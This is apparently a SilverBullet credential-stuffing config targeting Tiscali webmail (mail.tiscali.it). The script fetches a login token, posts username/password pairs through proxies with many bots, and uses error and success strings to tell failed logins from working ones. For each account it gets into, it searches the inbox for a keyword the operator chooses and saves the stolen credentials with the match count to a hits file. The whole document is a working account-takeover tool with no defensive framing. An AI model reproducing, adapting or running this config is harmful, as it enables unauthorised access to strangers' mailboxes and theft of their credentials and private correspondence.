[SETTINGS]
{
  "Name": "tiscali.it",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-05-26T23:54:54.219639+07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@ntphong04",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Nhap tu khoa",
      "VariableName": "kw",
      "Id": 352365851
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "tiscali",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://mail.tiscali.it/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "\"request_token\":\"" "\"}" -> VAR "tk" 

PARSE "<USER>" LR "" "@" -> VAR "un" 

REQUEST POST "https://mail.tiscali.it/" 
  CONTENT "_token=<tk>&_action=login&_task=login&_url=&_timezone=7&t_f_field=1&_user=<un>&_pass=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Host: mail.tiscali.it" 
  HEADER "Origin: https://mail.tiscali.it" 
  HEADER "Referer: https://mail.tiscali.it/" 
  HEADER "sec-ch-ua: \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\", \"Google Chrome\";v=\"108\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Errore: Accesso negato. Controlla nome utente e password e riprova." 
    KEY "Per motivi di sicurezza la tua casella è stata bloccata" 
  KEYCHAIN Success OR 
    KEY "nuove" 
    KEY "Spazio mail occupato" 

PARSE "<SOURCE>" LR "\"request_token\":\"" "\"})" -> VAR "rqtk" 

REQUEST GET "https://mail.tiscali.it/?_task=mail&_action=search&_q=<kw>&_mbox=INBOX&_headers=subject,from&_parent_search=INBOX&_remote=1&_unlock=listloading" 
  
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Host: mail.tiscali.it" 
  HEADER "Referer: https://mail.tiscali.it/?_page=1&_task=mail&_mbox=INBOX" 
  HEADER "sec-ch-ua: \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\", \"Google Chrome\";v=\"108\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "X-Roundcube-Request: <rqtk>" 

#messagecount PARSE "<SOURCE>" LR "\",\"messagecount\":" ",\"" CreateEmpty=FALSE -> CAP "Tin nhan chua tư khoa" 

FUNCTION ToLowercase "<Tin nhan chua tư khoa>" -> VAR "tn" 

UTILITY File "Access//Tiscali.it.txt" AppendLines "<un>@tiscali.it:<PASS> | <kw> = <tn>" 

